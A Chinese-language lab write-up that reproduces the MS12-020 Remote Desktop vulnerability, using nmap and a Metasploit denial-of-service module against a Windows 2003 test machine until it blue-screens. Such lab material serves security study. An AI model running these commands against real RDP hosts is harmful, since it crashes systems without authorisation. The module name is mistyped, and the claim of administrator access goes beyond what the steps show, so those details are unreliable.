一、原理
ms12-020漏洞的定义是指操作系统的远程桌面协议存在重大漏洞,入侵者(黑客)可以通过向远程桌面默认端口(3389)发一系列特定RDP包,从而获取超级管理员权限,进而入侵系统。
根据实际被入侵终端进行分析,开放远程桌面服务并使用默认的3389端口的会成为攻击目标。
二、实验环境
攻击机:kali
靶机win2003 ip:192. 168.252.136
两者都在同一内网,采用NAT连接方式
三、漏洞复现
1、开启win2003的远程桌面:控制面板-->系统-->远程-->远程协助-->远程桌面
2、控制面板-->windows防火墙-->例外-->远程桌面
3、用nmap扫描靶机,发现靶机的3389端口已经打开
输入:nmap 192.168.252.136
4、在kali的终端中打开msfconsole
5、使用search功能搜索ms12-020,发现有两个可用模块。
输入:search ms12-020
6、使用第一个可用版模块
输入:use auxiliary/dos/windows/rdp/ma12_020_maxchannelids
7、利用set命令设置攻击的IP。
输入:set rhosts 192.168.252.136
show options
8、输入:exploit,执行攻击
9、看一下靶机,发现靶机蓝屏了